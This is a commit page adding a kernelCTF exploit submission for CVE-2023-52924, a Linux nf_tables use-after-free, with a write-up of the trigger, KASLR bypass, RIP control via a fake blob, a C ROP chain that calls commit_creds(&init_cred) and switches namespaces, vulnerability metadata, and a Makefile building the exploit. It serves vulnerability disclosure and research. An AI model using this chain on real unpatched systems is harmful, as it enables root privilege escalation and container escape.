Skip to content

Commit 07dd138

Browse files
author
Mingi Cho
committed
Add kernelCTF CVE-2023-52924_mitigation
1 parent 908d59b commit 07dd138

File tree

8 files changed

+1358
-0
lines changed

8 files changed

+1358
-0
lines changed
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,179 @@
1+
# Overview
2+
3+
There is an asymmetry between commit/abort and preparation phase if the following conditions are met:
4+
5+
1. set is a verdict map ("1.2.3.4 : jump foo")
6+
2. timeouts are enabled
7+
8+
In this case, following sequence is problematic:
9+
10+
1. element E in set S refers to chain C
11+
2. userspace requests removal of set S
12+
3. kernel does a set walk to decrement chain->use count for all elements from preparation phase
13+
4. kernel does another set walk to remove elements from the commit phase (or another walk to do a chain->use increment for all elements from abort phase)
14+
15+
If E has already expired in 1), it will be ignored during list walk, so its use count won't have been changed.
16+
17+
We can trigger a UAF from this vulnerability as follows. First, create a victim set and a victim chain, and create an immediate expr pointing to the victim chain to create a dangling pointer. At this point, the victim chain's reference count (`nft_chain->use`) is set to 1. Then, we add a set element which is configured short timeout to this victim set that points to the victim chain. Now, the reference count of the victim chain becomes 2. Next, we trigger the vulnerability by deleting the set twice. The first deletion decreases the reference count of the victim's chain, and the second deletion aborts the first deletion but does not increase the reference count of the chain. Additionally, the add set element is also aborted, reducing the reference count of the chain. The victim chain's reference count is now set to zero. Since the reference count of the victim chain is zero, the chain can be free. As a result, the victim chain is left as a dangling pointer in the immediate expr.
18+
19+
# KASLR Bypass and Information Leak
20+
21+
We used a timing side channel attack to leak the kernel base, and created a fake ops in the non-randomized CPU entry area (CVE-2023-0597) without leaking the heap address.
22+
23+
# RIP Control
24+
25+
```c
26+
struct nft_chain {
27+
struct nft_rule_blob __rcu *blob_gen_0;
28+
struct nft_rule_blob __rcu *blob_gen_1;
29+
struct list_head rules;
30+
struct list_head list;
31+
struct rhlist_head rhlhead;
32+
struct nft_table *table;
33+
u64 handle;
34+
u32 use;
35+
u8 flags:5,
36+
bound:1,
37+
genmask:2;
38+
char *name;
39+
u16 udlen;
40+
u8 *udata;
41+
42+
/* Only used during control plane commit phase: */
43+
struct nft_rule_blob *blob_next;
44+
};
45+
```
46+
47+
When the vulnerability is triggered, the freed `chain->blob_gen_0` can be accessed via `immediate expr`. We leave the chain freed and spray an object to create a fake blob in `blob_gen_0`.
48+
49+
```c
50+
unsigned int
51+
nft_do_chain(struct nft_pktinfo *pkt, void *priv)
52+
{
53+
...
54+
do_chain:
55+
if (genbit)
56+
blob = rcu_dereference(chain->blob_gen_1);
57+
else
58+
blob = rcu_dereference(chain->blob_gen_0);
59+
60+
rule = (struct nft_rule_dp *)blob->data;
61+
last_rule = (void *)blob->data + blob->size;
62+
next_rule:
63+
regs.verdict.code = NFT_CONTINUE;
64+
for (; rule < last_rule; rule = nft_rule_next(rule)) {
65+
nft_rule_dp_for_each_expr(expr, last, rule) {
66+
if (expr->ops == &nft_cmp_fast_ops)
67+
nft_cmp_fast_eval(expr, &regs);
68+
else if (expr->ops == &nft_cmp16_fast_ops)
69+
nft_cmp16_fast_eval(expr, &regs);
70+
else if (expr->ops == &nft_bitwise_fast_ops)
71+
nft_bitwise_fast_eval(expr, &regs);
72+
else if (expr->ops != &nft_payload_fast_ops ||
73+
!nft_payload_fast_eval(expr, &regs, pkt))
74+
expr_call_ops_eval(expr, &regs, pkt);
75+
76+
if (regs.verdict.code != NFT_CONTINUE)
77+
break;
78+
}
79+
```
80+
81+
```c
82+
static void expr_call_ops_eval(const struct nft_expr *expr,
83+
struct nft_regs *regs,
84+
struct nft_pktinfo *pkt)
85+
{
86+
#ifdef CONFIG_RETPOLINE
87+
unsigned long e = (unsigned long)expr->ops->eval;
88+
#define X(e, fun) \
89+
do { if ((e) == (unsigned long)(fun)) \
90+
return fun(expr, regs, pkt); } while (0)
91+
92+
X(e, nft_payload_eval);
93+
X(e, nft_cmp_eval);
94+
X(e, nft_counter_eval);
95+
X(e, nft_meta_get_eval);
96+
X(e, nft_lookup_eval);
97+
X(e, nft_range_eval);
98+
X(e, nft_immediate_eval);
99+
X(e, nft_byteorder_eval);
100+
X(e, nft_dynset_eval);
101+
X(e, nft_rt_get_eval);
102+
X(e, nft_bitwise_eval);
103+
#undef X
104+
#endif /* CONFIG_RETPOLINE */
105+
expr->ops->eval(expr, regs, pkt);
106+
}
107+
```
108+
109+
`chain->blob_gen_0` is used in `nft_do_chain`, and `expr->ops->eval` is called to evaluate the expression in `expr_call_ops_eval`. We set the ops of the fake expr to the CPU entry area to control the RIP. We allocate the fake blob object larger than 0x2000 to use page allocator.
110+
111+
# Post-RIP
112+
113+
The ROP payload is stored in `chain->blob_gen_0` which is allocated by page allocator.
114+
115+
When `eval()` is called, `RBX` points to `chain->blob_gen_0+0x10`, which is the beginning of the `nft_expr` structure.
116+
117+
```c
118+
void rop_chain(uint64_t* data){
119+
int i = 0;
120+
121+
// nft_rule_blob.size > 0
122+
data[i++] = 0x100;
123+
// nft_rule_blob.dlen > 0
124+
data[i++] = 0x100;
125+
126+
// fake ops addr
127+
data[i++] = PAYLOAD_LOCATION(1) + offsetof(struct cpu_entry_area_payload, nft_expr_eval);
128+
129+
// current = find_task_by_vpid(getpid())
130+
data[i++] = kbase + POP_RDI_RET;
131+
data[i++] = getpid();
132+
data[i++] = kbase + FIND_TASK_BY_VPID;
133+
134+
// current += offsetof(struct task_struct, rcu_read_lock_nesting)
135+
data[i++] = kbase + POP_RSI_RET;
136+
data[i++] = RCU_READ_LOCK_NESTING_OFF;
137+
data[i++] = kbase + ADD_RAX_RSI_RET;
138+
139+
// current->rcu_read_lock_nesting = 0 (Bypass rcu protected section)
140+
data[i++] = kbase + POP_RCX_RET;
141+
data[i++] = 0;
142+
data[i++] = kbase + MOV_RAX_RCX_RET;
143+
144+
// Bypass "schedule while atomic": set oops_in_progress = 1
145+
data[i++] = kbase + POP_RDI_RET;
146+
data[i++] = 1;
147+
data[i++] = kbase + POP_RSI_RET;
148+
data[i++] = kbase + OOPS_IN_PROGRESS;
149+
data[i++] = kbase + MOV_RSI_RDI_RET;
150+
151+
// commit_creds(&init_cred)
152+
data[i++] = kbase + POP_RDI_RET;
153+
data[i++] = kbase + INIT_CRED;
154+
data[i++] = kbase + COMMIT_CREDS;
155+
156+
// find_task_by_vpid(1)
157+
data[i++] = kbase + POP_RDI_RET;
158+
data[i++] = 1;
159+
data[i++] = kbase + FIND_TASK_BY_VPID;
160+
161+
data[i++] = kbase + POP_RSI_RET;
162+
data[i++] = 0;
163+
164+
// switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy)
165+
data[i++] = kbase + MOV_RDI_RAX_RET;
166+
data[i++] = kbase + POP_RSI_RET;
167+
data[i++] = kbase + INIT_NSPROXY;
168+
data[i++] = kbase + SWITCH_TASK_NAMESPACES;
169+
170+
data[i++] = kbase + SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE;
171+
data[i++] = 0;
172+
data[i++] = 0;
173+
data[i++] = _user_rip;
174+
data[i++] = _user_cs;
175+
data[i++] = _user_rflags;
176+
data[i++] = _user_sp;
177+
data[i++] = _user_ss;
178+
}
179+
```
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,12 @@
1+
- Requirements:
2+
- Capabilities: CAP_NET_ADMIN
3+
- Kernel configuration: CONFIG_NETFILTER, CONFIG_NF_TABLES
4+
- User namespaces required: Yes
5+
- Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=9d0982927e79 (netfilter: nft_hash: add support for timeouts)
6+
- Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=24138933b97b055d486e8064b4a1721702442a9b (netfilter: nf_tables: don't skip expired elements during walk)
7+
- Affected Version: v4.1 - v6.5
8+
- Affected Component: net/netfilter
9+
- Cause: Use-After-Free
10+
- Syscall to disable: disallow unprivileged username space
11+
- URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-52924
12+
- Description: In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_tables: don't skip expired elements during walk There is an asymmetry between commit/abort and preparation phase if the following conditions are met: 1. set is a verdict map ("1.2.3.4 : jump foo") 2. timeouts are enabled In this case, following sequence is problematic: 1. element E in set S refers to chain C 2. userspace requests removal of set S 3. kernel does a set walk to decrement chain->use count for all elements from preparation phase 4. kernel does another set walk to remove elements from the commit phase (or another walk to do a chain->use increment for all elements from abort phase) If E has already expired in 1), it will be ignored during list walk, so its use count won't have been changed. Then, when set is culled, ->destroy callback will zap the element via nf_tables_set_elem_destroy(), but this function is only safe for elements that have been deactivated earlier from the preparation phase: lack of earlier deactivate removes the element but leaks the chain use count, which results in a WARN splat when the chain gets removed later, plus a leak of the nft_chain structure. Update pipapo_get() not to skip expired elements, otherwise flush command reports bogus ENOENT errors.
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,35 @@
1+
LIBMNL_DIR = $(realpath ./)/libmnl_build
2+
LIBNFTNL_DIR = $(realpath ./)/libnftnl_build
3+
4+
exploit:
5+
gcc -o exploit exploit.c -L$(LIBNFTNL_DIR)/install/lib -L$(LIBMNL_DIR)/install/lib -lnftnl -lmnl -I$(LIBNFTNL_DIR)/libnftnl-1.2.5/include -I$(LIBMNL_DIR)/libmnl-1.0.5/include -static -s
6+
7+
prerequisites: libmnl-build libnftnl-build
8+
9+
libmnl-build : libmnl-download
10+
tar -C $(LIBMNL_DIR) -xvf $(LIBMNL_DIR)/libmnl-1.0.5.tar.bz2
11+
cd $(LIBMNL_DIR)/libmnl-1.0.5 && ./configure --enable-static --prefix=`realpath ../install`
12+
cd $(LIBMNL_DIR)/libmnl-1.0.5 && make
13+
cd $(LIBMNL_DIR)/libmnl-1.0.5 && make install
14+
15+
libnftnl-build : libmnl-build libnftnl-download
16+
tar -C $(LIBNFTNL_DIR) -xvf $(LIBNFTNL_DIR)/libnftnl-1.2.5.tar.xz
17+
cd $(LIBNFTNL_DIR)/libnftnl-1.2.5 && PKG_CONFIG_PATH=$(LIBMNL_DIR)/install/lib/pkgconfig ./configure --enable-static --prefix=`realpath ../install`
18+
cd $(LIBNFTNL_DIR)/libnftnl-1.2.5 && C_INCLUDE_PATH=$(C_INCLUDE_PATH):$(LIBMNL_DIR)/install/include LD_LIBRARY_PATH=$(LD_LIBRARY_PATH):$(LIBMNL_DIR)/install/lib make
19+
cd $(LIBNFTNL_DIR)/libnftnl-1.2.5 && make install
20+
21+
libmnl-download :
22+
mkdir $(LIBMNL_DIR)
23+
wget -P $(LIBMNL_DIR) https://netfilter.org/projects/libmnl/files/libmnl-1.0.5.tar.bz2
24+
25+
libnftnl-download :
26+
mkdir $(LIBNFTNL_DIR)
27+
wget -P $(LIBNFTNL_DIR) https://netfilter.org/projects/libnftnl/files/libnftnl-1.2.5.tar.xz
28+
29+
run:
30+
./exploit
31+
32+
clean:
33+
rm -rf $(LIBMNL_DIR)
34+
rm -rf $(LIBNFTNL_DIR)
35+
rm -f exploit

0 commit comments

Comments
 (0)